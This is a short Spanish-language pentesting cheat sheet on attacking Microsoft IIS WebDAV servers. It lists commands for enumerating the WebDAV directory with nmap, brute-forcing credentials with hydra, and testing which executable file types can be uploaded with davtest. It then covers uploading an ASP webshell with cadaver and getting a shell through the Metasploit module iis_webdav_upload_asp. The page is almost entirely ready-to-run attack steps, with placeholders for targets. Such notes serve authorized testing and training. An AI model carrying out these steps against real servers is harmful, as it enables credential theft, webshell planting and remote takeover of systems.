IIS WebDav

WebDAV es una extensión de HTTP que facilita la gestión colaborativa de archivos en servidores web a través de IIS (Servicios de Información de Internet). Permite realizar operaciones como crear, modificar y mover documentos en un servidor directamente desde un cliente.

Para configurarlo, se utiliza el Administrador de IIS, que ofrece herramientas para ajustar configuraciones de WebDAV

Enumeración de Directorio Webdav Activo

nmap -sV -p 80 —script=http-enum <IP>/

Fuerza Bruta Usuarios y Pass

hydra -L <diccionario de usuarios> -P <diccionario de contraseñas> <ip> http-get /webdav/

Explotación con Davtest (Manual)

davtest -auth <user>:<password> -url <URL>/webdav

Esto nos dira que tipo de archivo podemos subir (.asp, .js, .php ....) y nos dirá cual ejecutar

Subida archivos con Cadaver (webshell)

Cadaver es una herramienta de línea de comandos utilizada para interactuar con servidores WebDAV. Es especialmente útil para subir, descargar, y gestionar archivos en un servidor WebDAV. En el contexto de pentesting, cadaver se emplea para cargar webshells o ejecutar otras acciones que permitan explorar las capacidades de carga de archivos en aplicaciones web vulnerables.

cadaver <URL>/webdav

Indicamos user y password y nos devuelve una shell

Generamos un payload con msfvenom (explicado más abajo), o descargamos un archivo webshell con extensión asp. En Kali y Parrot se encuentran en la ruta /usr/share/webshells/asp/webshell.asp

put /usr/share/webshells/asp/webshell.asp

Despues accedemos en el navegador a la ruta donde hayamos subido la webshell y ya la tenemos lista para poder ejecutar comandos

Explotación con Metasploit (Recomendado)

Modulo a usar exploit/windows/iis/iis_webdav_upload_asp

use exploit/windows/iis/iis_webdav_upload_asp

set HttpUsername <username>
set HttpPassword <password>
set RHOSTS <IP víctima>
set PATH /webdav/metasploit.asp

Obtenemos la shell

Última actualización hace 1 año